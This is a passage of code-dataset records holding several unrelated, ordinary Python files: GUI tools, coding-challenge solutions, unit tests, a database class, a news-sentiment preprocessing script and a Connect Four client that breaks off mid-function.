localpath=r\"C:\\Users\\steve\\team-6-sftp-pipeline\\GUI-Test\\sent-back.txt\")\n        self.File_Name_Output.setText(\"File \" + fname_basefile + \" downloaded successfully!\")\n        \n        \n    #Create Preset Button Clicked    \n    def presetClicker(self):\n        #preset base file name\n        global preset_basefile\n        #preset open file dialog\n        presetName = QFileDialog.getOpenFileNames(self, \"Open Files\", \"C:\", \"All Files (*)\")\n        \n        #preset_basefile = os.path.basename(presetName)\n        #print(preset_basefile)\n        newPreset.append(presetName[0])\n        #newPreset.append(preset_basefile)\n        \n        if presetName:\n            presetString = ''.join(''.join(y) for y in newPreset)\n            self.Preset_Label.setText(presetString)\n        \n#Initialize App\napp = QApplication(sys.argv)\nUIWindow = MainWindow()\napp.exec_()\n    ","repo_name":"Jorphi/SFTP-Pipeline","sub_path":"Views/guitest.py","file_name":"guitest.py","file_ext":"py","file_size_in_byte":3429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27099312209","text":"class Solution:\n    def canFormArray(self, arr: List[int], pieces: List[List[int]]) -> bool:\n        mark = {}\n        for i in range(len(pieces)):\n            mark[pieces[i][0]]=i\n        i=0\n        while i<len(arr):\n            if arr[i] not in mark:\n                return False\n            index = mark[arr[i]]\n            for j in range(len(pieces[index])):\n                if i+j>=len(arr):\n                    return False\n                if arr[i+j]!=pieces[index][j]:\n                    return False\n            i=i+len(pieces[index])\n        return True","repo_name":"0xtinyuk/LeetCode","sub_path":"Algorithms/1640. Check Array Formation Through Concatenation.py","file_name":"1640. 
Check Array Formation Through Concatenation.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"839537592","text":"#!/usr/bin/env python3\n\nimport datetime\nprint (datetime.datetime.now())\n\ndef groupbuzz(num):\n if (num % 3 == 0 and num % 5 == 0):\n print(\"GroupON\")\n elif (num % 3 == 0 ):\n print(\"Group\")\n elif(num % 5 == 0 ):\n print(\"On\")\n else:\n print(num)\n\nfor i in range(1,17):\n groupbuzz(i)\n","repo_name":"jfdetke/Python","sub_path":"grouponbuzz.py","file_name":"grouponbuzz.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71523023930","text":"from model.funcao import Funcao\nfrom config.conexao import conectar\n\n\nclass Funcionario():\n def __init__(self, nome: str, cpf: str, funcao: Funcao, salario: float, telefone: str) -> None:\n self.nome = nome\n self.cpf = cpf\n self.funcao = funcao\n self.salario = salario\n self.telefone = telefone\n self.__inserir_funcionario__()\n\n def __inserir_funcionario__(self):\n conexao = conectar()\n\n with conexao.cursor() as c:\n sql = \"INSERT INTO funcionario (cpf, nome, funcao, salario, telefone) VALUES (%s, %s, (SELECT funcao.id FROM funcao WHERE cod = %s), %s, %s)\"\n c.execute(sql, (self.cpf, self.nome, self.funcao.cod, self.salario, self.telefone))\n conexao.commit()\n conexao.close()\n\n @staticmethod\n def pesquisar_funcionario():\n cpf = input('Informe o cpf desejado: ')\n print('-'*20)\n\n conexao = conectar()\n with conexao.cursor() as c:\n sql = \"SELECT funcionario.cpf, funcionario.nome, funcionario.salario, funcionario.telefone, funcao.nome FROM funcionario, funcao WHERE funcao.id = funcionario.funcao AND funcionario.cpf = %s\"\n c.execute(sql, (cpf))\n res_one = c.fetchone()\n conexao.close()\n return res_one\n\n @staticmethod\n def __editar_funcionario__():\n registro = Funcionario.pesquisar_funcionario()\n\n if registro:\n print('O que deseja editar?')\n condicao = 1\n\n while condicao != 0:\n print('[1] - Nome')\n print('[2] - CPF')\n print('[3] - Salário')\n print('[4] - Telefone')\n print('[5] - Função')\n print('[0] - Voltar')\n print('-'*20)\n try:\n opcao = int(input('Sua opção: '))\n if opcao == 1:\n nome = str(input('Novo nome: '))\n print('-'*20)\n\n conexao = conectar()\n with conexao.cursor() as cursor:\n sql = \"UPDATE funcionario SET nome=%s WHERE cpf=%s\"\n cursor.execute(sql, (nome, registro['cpf']))\n conexao.commit()\n conexao.close()\n\n print('Nome atualizado com sucesso !')\n print('-'*20)\n\n elif opcao == 2:\n while condicao != -1:\n cpf = str(input('CPF: '))\n\n if cpf.isnumeric() and len(cpf) == 11 and int(cpf) > 0:\n condicao = -1 \n else:\n print('[ERRO] Somente letras e tamanho deve ser igual a 11')\n\n conexao = conectar()\n with conexao.cursor() as cursor:\n sql = \"UPDATE funcionario SET cpf=%s WHERE cpf=%s\"\n cursor.execute(sql, (cpf, registro['cpf']))\n conexao.commit()\n conexao.close()\n\n registro['cpf'] = cpf\n print('-'*20)\n print('CPF atualizado !')\n print('-'*20)\n\n elif opcao == 3:\n\n while condicao != -3:\n try:\n salario = float(input('Salário: '))\n\n if salario > 0:\n print('-'*20)\n print('Salário atualizado com sucesso !')\n print('-'*20)\n\n conexao = conectar()\n with conexao.cursor() as cursor:\n sql = \"UPDATE funcionario SET salario=%s WHERE cpf=%s\"\n cursor.execute(sql, (salario, registro['cpf']))\n conexao.commit()\n conexao.close()\n \n condicao = 
-3\n\n else:\n print('[ERROR] Salário não pode ser negativo')\n\n except ValueError:\n\n print('[ERROR] Somente números positivos')\n\n \n elif opcao == 4:\n telefone = str(input('Novo telefone: '))\n\n conexao = conectar()\n with conexao.cursor() as cursor:\n sql = \"UPDATE funcionario SET telefone=%s WHERE cpf=%s\"\n cursor.execute(sql, (telefone, registro['cpf']))\n conexao.commit()\n conexao.close()\n\n print('-'*20)\n print('Telefone atualizado com sucesso !')\n print('-'*20)\n\n elif opcao == 5:\n funcao = Funcao.pesquisar_funcao()\n\n if funcao:\n print(f'Função atualizada para {funcao[\"nome\"]}')\n print('-'*20)\n\n conexao = conectar()\n with conexao.cursor() as cursor:\n sql = \"UPDATE funcionario SET funcao=(SELECT funcao.id FROM funcao WHERE cod=%s) WHERE cpf= %s\"\n cursor.execute(sql, (funcao['cod'], registro['cpf']))\n conexao.commit()\n conexao.close()\n\n elif opcao == 0:\n condicao = 0\n else:\n print('[ERROR] Opção inválida')\n\n except ValueError:\n print('[ERROR] Aceita somente numero')\n \n @staticmethod\n def __deletar_funcionario__():\n registro = Funcionario.pesquisar_funcionario()\n\n if registro:\n conexao = conectar()\n with conexao.cursor() as cursor:\n sql = \"DELETE FROM funcionario WHERE cpf=%s\"\n cursor.execute(sql, (registro['cpf']))\n conexao.commit()\n conexao.close()\n\n print('Excluindo com sucesso !')\n print('-'*20) \n\n else:\n print('[ERROR] Funcionário não cadastrado') ","repo_name":"kladDev/poo-python","sub_path":"OOP/empresa/model/funcionario.py","file_name":"funcionario.py","file_ext":"py","file_size_in_byte":6591,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10266949253","text":"from soc.modules.seeder.logic.providers.provider import ParameterValueError\nfrom soc.modules.seeder.logic.providers.provider import MissingParameterError\nfrom soc.modules.seeder.logic.providers.integer import FixedIntegerProvider\nfrom soc.modules.seeder.logic.providers.integer import RandomUniformDistributionIntegerProvider\nfrom soc.modules.seeder.logic.providers.integer import RandomNormalDistributionIntegerProvider\nfrom soc.modules.seeder.logic.providers.integer import SequenceIntegerProvider\nimport unittest\n\n\n__authors__ = [\n '\"Felix Kerekes\" ',\n ]\n\n\nclass FixedIntegerProviderTest(unittest.TestCase):\n \"\"\"Test class for FixedIntegerProvider.\n \"\"\"\n\n def setUp(self):\n self.provider = FixedIntegerProvider()\n\n def tearDown(self):\n pass\n\n def testGetValue(self):\n \"\"\"Tests FixedIntegerProvider.getValue()\n \"\"\"\n value = 5\n self.provider.param_values = {'value': value}\n self.assertEquals(self.provider.getValue(), value)\n\n def testGetValueWithInvalidParameters(self):\n \"\"\"Tests getValue() with an invalid integer value.\n \"\"\"\n value = 'asdf'\n self.provider.param_values = {'value': value}\n self.assertRaises(ParameterValueError, self.provider.getValue)\n\n\n# pylint: disable=W0622\nclass RandomUniformDistributionIntegerProviderTest(unittest.TestCase):\n \"\"\"Test class for RandomUniformDistributionIntegerProvider.\n \"\"\"\n\n def setUp(self):\n self.provider = RandomUniformDistributionIntegerProvider()\n\n def tearDown(self):\n pass\n\n def testGetValue(self):\n \"\"\"Tests getValue()\n \"\"\"\n value = self.provider.getValue()\n self.assertTrue(self.provider.DEFAULT_MIN <= value <=\n self.provider.DEFAULT_MAX)\n min = 0\n max = 10\n self.provider.param_values = {'min': min, 'max': max}\n value = self.provider.getValue()\n self.assertTrue(min <= value <= 
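# --- Editor's sketch (hypothetical, not in the original file): the edit branches
# above repeat the same connect/execute/commit boilerplate. One helper could
# centralise it; the column name must come from a fixed whitelist, never from user input.
def atualizar_campo(campo: str, valor, cpf: str) -> None:
    assert campo in {"nome", "cpf", "salario", "telefone"}  # whitelist keeps the f-string safe
    conexao = conectar()
    with conexao.cursor() as cursor:
        cursor.execute(f"UPDATE funcionario SET {campo}=%s WHERE cpf=%s", (valor, cpf))
    conexao.commit()
    conexao.close()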
max)\n\n def testGetValueWithInvalidParameters(self):\n \"\"\"Tests getValue() with invalid min and max parameters.\n \"\"\"\n min = 'asdf'\n max = None\n self.provider.param_values = {'min': min, 'max': max}\n self.assertRaises(ParameterValueError, self.provider.getValue)\n\n\nclass RandomNormalDistributionIntegerProviderTest(unittest.TestCase):\n \"\"\"Test class for NormalIntegerProvider.\n \"\"\"\n\n def setUp(self):\n self.provider = RandomNormalDistributionIntegerProvider()\n\n def tearDown(self):\n pass\n\n def testGetValue(self):\n \"\"\"Tests getValue()\n \"\"\"\n value = self.provider.getValue()\n self.assertTrue(self.provider.DEFAULT_MIN <= value <=\n self.provider.DEFAULT_MAX)\n min = 0\n max = 100\n mean = 50\n variance = 10\n self.provider.param_values = {'min': min,\n 'max': max,\n 'mean': mean,\n 'variance': variance}\n value = self.provider.getValue()\n self.assertTrue(min <= value <= max)\n\n def testGetValueWithInvalidParameters(self):\n \"\"\"Tests getValue() with invalid parameters.\n \"\"\"\n min = 'asdf'\n max = None\n mean = None\n stdev = 'asdf'\n self.provider.param_values = {'min': min,\n 'max': max}\n self.assertRaises(ParameterValueError, self.provider.getValue)\n\n self.provider.param_values = {'mean': mean,\n 'stdev': stdev}\n self.assertRaises(ParameterValueError, self.provider.getValue)\n\n\nclass SequenceIntegerProviderTest(unittest.TestCase):\n \"\"\"Test class for SequenceIntegerProvider.\n \"\"\"\n\n def setUp(self):\n self.provider = SequenceIntegerProvider()\n\n\n def tearDown(self):\n pass\n\n def testGetValue(self):\n \"\"\"Tests getValue()\n \"\"\"\n name = 'test'\n self.provider.param_values = {'name': name}\n\n next = self.provider.DEFAULT_START\n self.assertEquals(self.provider.getValue(), next)\n\n next = next + self.provider.DEFAULT_STEP\n self.assertEquals(self.provider.getValue(), next)\n\n next = next + self.provider.DEFAULT_STEP\n self.assertEquals(self.provider.getValue(), next)\n\n def testGetValueWithInvalidParameters(self):\n \"\"\"Tests getValue() with invalid parameters.\n \"\"\"\n self.assertRaises(MissingParameterError, self.provider.getValue)\n\n name = 'test'\n start = \"asdf\"\n step = None\n\n self.provider.param_values = {'name': name, 'start': start, 'step': step}\n self.assertRaises(ParameterValueError, self.provider.getValue)\n","repo_name":"SRabbelier/Melange","sub_path":"tests/app/soc/modules/seeder/logic/providers/test_integer.py","file_name":"test_integer.py","file_ext":"py","file_size_in_byte":4403,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"74438894007","text":"def almostIncreasingSequence(sequence: list) -> bool:\n changes = 0\n if len(sequence) == 2:\n return True\n for i in range(len(sequence)):\n if i + 1 < len(sequence) and sequence[i+1] <= sequence[i]:\n changes += 1\n skipNeighbor = i + \\\n 2 < len(sequence) and sequence[i + 2] <= sequence[i]\n skipBack = i - 1 >= 0 and sequence[i+1] <= sequence[i - 1]\n if skipNeighbor and skipBack or changes >= 2:\n return False\n\n return True\n\n\ndef almostIncreasingSequence2(sequence: list) -> bool:\n droppped = False\n last = prev = min(sequence) - 1\n for elm in sequence:\n if elm <= last:\n if droppped:\n return False\n else:\n droppped = True\n if elm <= prev:\n prev = last\n elif elm >= prev:\n prev = last = elm\n else:\n prev, last = last, elm\n return True\n\n\na1 = [1, 3, 2, 1] # should return False\na2 = [1, 3, 2] # should return True\na3 = [1, 2, 3, 4, 3, 6] # should return True\na4 = [3, 6, 5, 
8, 10, 20, 15] # should return False\na5 = [123, -17, -5, 1, 2, 3, 12, 43, 45] # should return True\na6 = [1, 2, 1, 2] # should return False\na7 = [1, 1, 2, 3, 4, 4] # should return False\n\nprint(almostIncreasingSequence2(a1))\n# print(almostIncreasingSequence(a2))\n# print(almostIncreasingSequence(a3))\n# print(almostIncreasingSequence(a4))\n# print(almostIncreasingSequence(a5))\n# print(almostIncreasingSequence(a6))\n# print(almostIncreasingSequence(a7))\n","repo_name":"alxdi4z/code-challenges-python","sub_path":"almost_increasing_sequence.py","file_name":"almost_increasing_sequence.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10509261687","text":"# -*- coding: utf-8 -*-\nimport wx\nfrom vistas.frame_desmantelado_campania import FrameDesmanteladoCampania \n\nfrom modelos.modelArticulos import ModeloArticulos\nfrom modelos.modelReporte import ModeloReporteDesmanteladoCampania\n\nclass ControladorDesmanteladoCampania:\n\tmdlArt = ModeloArticulos()\n\n\tdef __init__(self, parent, camp):\n\t\tself.parent = parent\n\t\tself.camp = camp\n\n\tdef run(self):\n\t\tself.frame = FrameDesmanteladoCampania(self.parent)\n\t\tself.capturarEventos()\n\t\tself.cargarDatos()\n\t\tself.frame.ShowModal()\n\n\tdef capturarEventos(self):\n\t\tself.frame.grilla.Bind(wx.grid.EVT_GRID_CELL_CHANGE, self.ModificarCant)\n\t\tself.frame.btn_generar.Bind(wx.EVT_BUTTON, self.GenerarReporte)\n\n\tdef cargarDatos(self):\n\t\tself.mdlArt.cam_anio = self.camp['anio']\n\t\tself.mdlArt.cam_num = self.camp['numero']\n\t\tself.lista = self.mdlArt.listarNoCobradosNoEntregados()\n\t\tself.cargarGrilla(self.lista)\n\n\tdef cargarGrilla(self, listado):\n\t\ttam = len(listado)\n\t\tself.frame.grilla.AppendRows(tam)\n\t\tself.configurarGrilla(tam)\n\t\tfor i in range(tam):\n\t\t\tself.frame.grilla.SetRowSize(i, 25)\n\t\t\tself.frame.grilla.SetCellValue(i, 0, str(listado[i][0]))\n\t\t\tself.frame.grilla.SetCellValue(i, 1, str(listado[i][1]))\n\t\t\tself.frame.grilla.SetCellValue(i, 2, str(listado[i][2]))\n\t\t\tself.frame.grilla.SetCellValue(i, 3, str(listado[i][3]))\n\t\t\tself.frame.grilla.SetCellValue(i, 4, str(listado[i][4]))\n\t\t\tself.frame.grilla.SetCellValue(i, 5, str(listado[i][5]))\n\t\t\tself.frame.grilla.SetCellValue(i, 6, str(listado[i][6]))\n\t\t\tself.frame.grilla.SetCellValue(i, 7, str(listado[i][7]))\n\t\t\tself.frame.grilla.SetCellValue(i, 8, str(listado[i][8]))\n\n\tdef configurarGrilla(self, filas):\n\t\t\"\"\"Este modulo se encarga de deshabilitar las celdas que no\n\t\t\tdeben ser editables.\"\"\"\n\t\tcolumnas = self.frame.grilla.GetNumberCols()\n\t\tfor j in range(columnas):\n\t\t\tif j != 1:\n\t\t\t\tfor i in range(filas):\n\t\t\t\t\tself.frame.grilla.SetReadOnly(i, j, True)\n\n\tdef ModificarCant(self, event):\n\t\tself.mdlArt.cli_codigo = self.frame.grilla.GetCellValue(event.GetRow(), 0)\n\t\tif self.frame.grilla.GetCellValue(event.GetRow(), 1).isdigit() and len(self.frame.grilla.GetCellValue(event.GetRow(), 1)) <= 2:\n\t\t\tself.mdlArt.cant = int(self.frame.grilla.GetCellValue(event.GetRow(), 1))\n\t\telse:\n\t\t\tself.mdlArt.cant = 0\n\t\tself.mdlArt.updateStock()\n\n\tdef GenerarReporte(self, event):\n\t\tnombreArchivo = \"/Desmantelado.xls\"\n\t\tdialog = wx.DirDialog(self.frame, \"SELECCIONAR CARPETA DE DESTINO:\",style=wx.DD_DEFAULT_STYLE | wx.DD_NEW_DIR_BUTTON)\n\t\trta = dialog.ShowModal()\n\t\tif rta == wx.ID_OK:\n\t\t\tdir = dialog.GetPath()\n\t\t\t\n\t\t\tdir = dir + 
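# --- Editor's addition (not in the original): the expected results from the comments
# above, written as executable checks. a5 is omitted: it requires dropping the *first*
# element, a case the two implementations handle differently.
for seq, expected in [([1, 3, 2, 1], False), ([1, 3, 2], True),
                      ([1, 2, 3, 4, 3, 6], True), ([3, 6, 5, 8, 10, 20, 15], False),
                      ([1, 2, 1, 2], False), ([1, 1, 2, 3, 4, 4], False)]:
    assert almostIncreasingSequence2(seq) == expected, seq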
nombreArchivo\n\t\t\tmdlMRDC = ModeloReporteDesmanteladoCampania(self.lista, dir)\n\t\t\ttry:\n\t\t\t\tmdlMRDC.generar_reporte()\n\t\t\texcept:\n\t\t\t\twx.MessageBox(\"Ha ocurrido un error al generar reporte.\", \"Ups!\")\n\t\t\telse:\n\t\t\t\twx.MessageBox(\"El reporte ha sido generado con exito.\", \"Enhorabuena!\")\n\n\t\tdialog.Destroy()","repo_name":"ihleonel/Proyecto-Distribuidora-304","sub_path":"proxl-plus/controladores/desmanteladoCampania.py","file_name":"desmanteladoCampania.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31799853179","text":"import argparse\nfrom os import path\nfrom tqdm import tqdm\nimport csv\nfrom nltk.tokenize import word_tokenize\nimport csv\nfrom transformers import BertTokenizer, AutoModelForSequenceClassification, pipeline\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\n\n#\n# config\n#\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--in-file', action='store', dest='in_file',\n help='news file', required=True)\nparser.add_argument('--out-dir', action='store', dest='out_dir',\n help='parsed/pre-processed content dir', required=True)\nparser.add_argument('--mode', action='store', dest='mode',\n help='train or test', required=True)\nparser.add_argument('--max-title', action='store', dest='max_title',\n help='max title length', default=20)\nparser.add_argument('--max-abstract', action='store', dest='max_abstract',\n help='max abstract length', default=50)\nparser.add_argument('--word-embeddings', action='store', dest='word_embeddings',\n help='pre-trained word embeddings', required=True)\nparser.add_argument('--word2int', action='store', dest='word2int',\n help='word to idx map')\nparser.add_argument('--embedding-weights', action='store', dest='embedding_weights',\n help='word embedding weights')\nparser.add_argument('--category2int', action='store', dest='category2int',\n help='category to idx map')\nargs = parser.parse_args()\n\n\n\n# generate word2int + extract embedding weights\ndef process_word_embeddings(word_embeddings_file):\n with open(word_embeddings_file, 'r') as wf:\n print(\"preparing/processing word-embeddings\") \n word_embeddings = wf.readlines()\n embeddings_map = {}\n for word_embedding in tqdm(word_embeddings):\n wdims = word_embedding.split(\" \")\n embeddings_map[wdims[0]] = \" \".join(wdims[1:])\n return embeddings_map\n\ndef load_idx_map_as_dict(file_name):\n with open(file_name, 'r') as file:\n dictionary = {}\n lines = file.readlines()\n for line in tqdm(lines):\n key, value = line.strip().split(\"\\t\")\n dictionary[key] = value\n return dictionary\n\ndef load_embedding_weights(file_name):\n embedding_weights = []\n with open(file_name, 'r') as file: \n lines = file.readlines()\n for line in tqdm(lines):\n embedding_weights.append(line)\n return embedding_weights\n\n# prep embedings/vocab\nembeddings = process_word_embeddings(args.word_embeddings)\n\n# parse news \nwith open(args.in_file, 'r') as in_file:\n with open(path.join(args.out_dir, 'parsed_news.tsv'), 'w') as news_file: \n news_writer = csv.writer(news_file, delimiter='\\t')\n print(\"preparing/processing news content\")\n news_collection = in_file.readlines()\n news2int = {}\n # BERT based sentiment analyzer\n dsb_sentiment_classifier = pipeline('sentiment-analysis', device=1)\n # VADER (rule) based sentiment analyzer\n vader_sentiment_classifier = SentimentIntensityAnalyzer()\n\n # BERT based - emotion analyzer based on 
go-emotions full\n ge_tokenizer = BertTokenizer.from_pretrained(\"monologg/bert-base-cased-goemotions-original\", max_length=50)\n ge_model = AutoModelForSequenceClassification.from_pretrained(\"monologg/bert-base-cased-goemotions-original\", num_labels=28)\n goemotions = pipeline(\n model=ge_model, \n tokenizer=ge_tokenizer, \n task=\"text-classification\",\n top_k=None,\n function_to_apply='sigmoid',\n device=1\n )\n # BERT based - emotion analyzer based on go-emotions grouped \n ge_grouped_tokenizer = BertTokenizer.from_pretrained(\"monologg/bert-base-cased-goemotions-group\", max_length=50)\n ge_grouped_model = AutoModelForSequenceClassification.from_pretrained(\"monologg/bert-base-cased-goemotions-group\", num_labels=4)\n goemotions_grouped = pipeline(\n model=ge_grouped_model, \n tokenizer=ge_grouped_tokenizer, \n task=\"text-classification\",\n top_k=None,\n function_to_apply='sigmoid',\n device=1\n )\n # BERT based - emotion analyzer based on go-emotions ekman\n ge_ekman_tokenizer = BertTokenizer.from_pretrained(\"monologg/bert-base-cased-goemotions-ekman\", max_length=50)\n ge_ekman_model = AutoModelForSequenceClassification.from_pretrained(\"monologg/bert-base-cased-goemotions-ekman\", num_labels=7)\n goemotions_ekman = pipeline(\n model=ge_ekman_model, \n tokenizer=ge_ekman_tokenizer, \n task=\"text-classification\",\n top_k=None,\n function_to_apply='sigmoid',\n device=1\n )\n # max title/abstract length\n max_title_length = int(args.max_title)\n max_abstract_length = int(args.max_abstract)\n if args.mode == \"train\": \n category2int = {}\n word2int = {}\n embedding_weights = []\n else:\n category2int = load_idx_map_as_dict(args.category2int)\n word2int = load_idx_map_as_dict(args.word2int)\n embedding_weights = load_embedding_weights(args.embedding_weights)\n\n # small helper to convert list of score to string with delimeter\n def scores_to_string(label_scores=[], delimeter=\" \"):\n return delimeter.join(\n map(lambda n: '%.8f'%n, \n [label_score['score'] for label_score in label_scores[0]]\n )) \n\n # iterate over news\n for news in tqdm(news_collection):\n newsid, category, subcategory, title, abstract, _, _, _ = news.strip().split(\"\\t\")\n if newsid not in news2int:\n news2int[newsid] = len(news2int) + 1\n else:\n continue\n # category to int\n if category not in category2int:\n if(args.mode == \"train\"):\n category2int[category] = len(category2int) + 1\n category_id = category2int[category]\n else:\n category_id = 0\n else: \n category_id = category2int[category]\n if subcategory not in category2int:\n if(args.mode == \"train\"):\n category2int[subcategory] = len(category2int) + 1\n subcategory_id = category2int[subcategory]\n else:\n subcategory_id = 0\n else: \n subcategory_id = category2int[subcategory]\n # parse/prep title --> to token ids\n # crop at max-title or pad to max-title\n title_tokens = word_tokenize(title.strip().lower())\n title_word_idxs = []\n for token in title_tokens:\n if token not in embeddings:\n continue\n if token not in word2int:\n word2int[token] = str(len(word2int) + 1)\n embedding_weights.append(embeddings[token])\n title_word_idxs.append(word2int[token])\n \n if len(title_word_idxs) > max_title_length:\n title_word_idxs = title_word_idxs[:max_title_length]\n else:\n title_word_idxs = title_word_idxs + [\"0\"]*(max_title_length-len(title_word_idxs))\n title_word_idxs_str = \" \".join(title_word_idxs)\n # parse/prep abstract --> to token ids\n # crop at max-abstract or pad to max-abstract\n abstract_tokens = 
word_tokenize(abstract.strip().lower())\n abstract_word_idxs = []\n for token in abstract_tokens:\n if token not in embeddings:\n continue\n if token not in word2int:\n word2int[token] = str(len(word2int) + 1)\n embedding_weights.append(embeddings[token])\n abstract_word_idxs.append(word2int[token])\n if len(abstract_word_idxs) > max_abstract_length:\n abstract_word_idxs = abstract_word_idxs[:max_abstract_length]\n else:\n abstract_word_idxs = abstract_word_idxs + [\"0\"]*(max_abstract_length-len(abstract_word_idxs))\n abstract_word_idxs_str = \" \".join(abstract_word_idxs)\n # calc sentiments scores\n # vader\n vs = vader_sentiment_classifier.polarity_scores(title.strip())\n vader_sentiment = vs['compound']\n # bert\n dsbs_label, dsbs_score = dsb_sentiment_classifier(title.strip())[0].values()\n if(dsbs_label == \"POSITIVE\"):\n bert_sentiment = (1-dsbs_score)*(-1) + dsbs_score\n else:\n bert_sentiment = (dsbs_score)*(-1) + (1-dsbs_score)\n\n input_title = [title.strip()]\n input_title_abstract = [title.strip() + \" \" + abstract.strip()]\n input_abstract = [abstract.strip()] if abstract.strip() else input_title_abstract\n\n # goemotions\n title_emotions = scores_to_string(goemotions(input_title, padding=True, truncation=True))\n abstract_emotions = scores_to_string(goemotions(input_abstract, padding=True, truncation=True))\n title_abstract_emotions = scores_to_string(goemotions(input_title_abstract, padding=True, truncation=True))\n # goemotions grouped\n title_emotions_grouped = scores_to_string(goemotions_grouped(input_title, padding=True, truncation=True))\n abstract_emotions_grouped = scores_to_string(goemotions_grouped(input_abstract, padding=True, truncation=True))\n title_abstract_emotions_grouped = scores_to_string(goemotions_grouped(input_title_abstract, padding=True, truncation=True))\n # ekman\n title_emotions_ekman = scores_to_string(goemotions_ekman(input_title, padding=True, truncation=True))\n abstract_emotions_ekman = scores_to_string(goemotions_ekman(input_abstract, padding=True, truncation=True))\n title_abstract_emotions_ekman = scores_to_string(goemotions_ekman(input_title_abstract, padding=True, truncation=True))\n\n # prepare output\n news_writer.writerow([\n newsid,\n category_id,\n subcategory_id,\n title_word_idxs_str,\n abstract_word_idxs_str,\n vader_sentiment,\n bert_sentiment, \n title_emotions,\n abstract_emotions,\n title_abstract_emotions,\n title_emotions_grouped,\n abstract_emotions_grouped,\n title_abstract_emotions_grouped,\n title_emotions_ekman,\n abstract_emotions_ekman,\n title_abstract_emotions_ekman\n ])\n if args.mode == \"train\":\n with open(path.join(args.out_dir, 'category2int.tsv'), 'w') as file: \n cat_writer = csv.writer(file, delimiter='\\t')\n for key, value in category2int.items():\n cat_writer.writerow([key, value])\n with open(path.join(args.out_dir, 'word2int.tsv'), 'w') as file:\n word_writer = csv.writer(file, delimiter='\\t')\n for key, value in word2int.items():\n word_writer.writerow([key, value])\n with open(path.join(args.out_dir, 'embedding_weights.csv'), 'w') as file:\n for weights in embedding_weights:\n file.write(weights)","repo_name":"MeteSertkan/EmoRec","sub_path":"project/data/parse_news.py","file_name":"parse_news.py","file_ext":"py","file_size_in_byte":11582,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"13449028302","text":"#왜 틀렸는지 모르겠다(해결 : 문제를 잘못 읽음)\n#하나는 맨 왼쪽 위 칸이 흰색인 경우, 하나는 검은색인 경우이다. 
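# --- Editor's sketch (not part of the original): the crop-or-pad logic above is
# written out twice (titles, abstracts); a tiny helper captures it once. "0" is the
# padding id, matching the script's convention.
def pad_or_crop(idxs, max_len, pad_id="0"):
    # keep the first max_len ids, or right-pad with the padding id up to max_len
    return idxs[:max_len] if len(idxs) >= max_len else idxs + [pad_id] * (max_len - len(idxs))

assert pad_or_crop(["3", "7"], 4) == ["3", "7", "0", "0"]
assert pad_or_crop(["1", "2", "3"], 2) == ["1", "2"]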
<< 요걸 못 읽었네\nimport sys\n\nN, M = map(int, input().split())\nchess = []\nfor i in range(N):\n chess.append(input())\nc=64\n\nfor a in range(N-8+1):\n for b in range(M-8+1):\n cnt = 0\n for j in range(8):\n for i in range(8):\n if 0==(j+a)%2:\n if 0 == (i+b)%2 and 'W' != chess[j+a][i+b]:\n #print('test1',chess[j+a][0][i+b], i+b, j+a) \n cnt+=1\n if 0 != (i+b)%2 and 'B' != chess[j+a][i+b]:\n #print('test2',chess[j+a][0][i+b],i+b,j+a) \n cnt+=1\n else:\n if 0 == (i+b)%2 and 'B' != chess[j+a][i+b]:\n #print('test3',chess[j+a][0][i+b],i+b,j+a) \n cnt+=1\n if 0 != (i+b)%2 and 'W' != chess[j+a][i+b]:\n #print('test4',chess[j+a][0][i+b],i+b,j+a)\n cnt+=1\n #print(cnt)\n c = min(c, min(64-cnt, cnt))\n #c.append(cnt)\n #c.append(cnt2)\n\n\nprint(c) \n#print(min(c))","repo_name":"weed700/coding_test","sub_path":"Baekjoon/Class2/sliver5_1018_체스판 다시 칠하기.py","file_name":"sliver5_1018_체스판 다시 칠하기.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70528510650","text":"from tkinter import Tk, Button, Entry, Frame, Label, messagebox\nimport requests, os, json\n\ndef clear_screen():\n for i in root.winfo_children():\n i.destroy()\n\n\nclass Game():\n def __init__(self):\n self.load_menu()\n self.tiles = [[0 for i in range(7)] for i in range(6)]\n self.url = \"http://127.0.0.1\"\n self.my_turn = False\n self.player_num = None\n self.game_data = {\n \"winner\":None\n }\n \n def load_menu(self):\n clear_screen()\n Label(\n text=\"Menu\",\n font=\"arial 20\"\n ).grid()\n selection_frame = Frame()\n selection_frame.grid()\n\n Button(\n master=selection_frame,\n text=\"Join\",\n width=15,\n height=3,\n font='arial 20',\n command= lambda: self.join_game_menu()\n ).grid(row=0, column=0)\n\n Button(\n master=selection_frame,\n text=\"Host\",\n width=15,\n height=3,\n font='arial 20',\n command= lambda: self.host_game()\n ).grid(row=0, column=1)\n\n def join_game_menu(self):\n clear_screen()\n Label(\n text=\"Join game\",\n font=\"arial 18\",\n width=20\n ).grid()\n\n url_entry = Entry(\n font='arial 18',\n width=20,\n )\n url_entry.insert(0, self.url)\n url_entry.grid()\n\n port_entry = Entry(\n font='arial 18',\n width=20,\n )\n port_entry.insert(0, \"Enter game port ...\")\n port_entry.grid()\n\n Button(\n text=\"Join\",\n font='arial 18',\n width=20,\n command= lambda port_entry=port_entry, url_entry=url_entry: self.join_game(port_entry, url_entry) \n ).grid()\n\n def join_game(self, port_entry, url_entry):\n self.url = url_entry.get()\n try:\n port = port_entry.get()\n if len(port) != 4:\n messagebox.showerror('ERROR','Invalid game code')\n return\n self.port = int(port)\n self.url += \":\" + str(self.port)\n except ValueError:\n 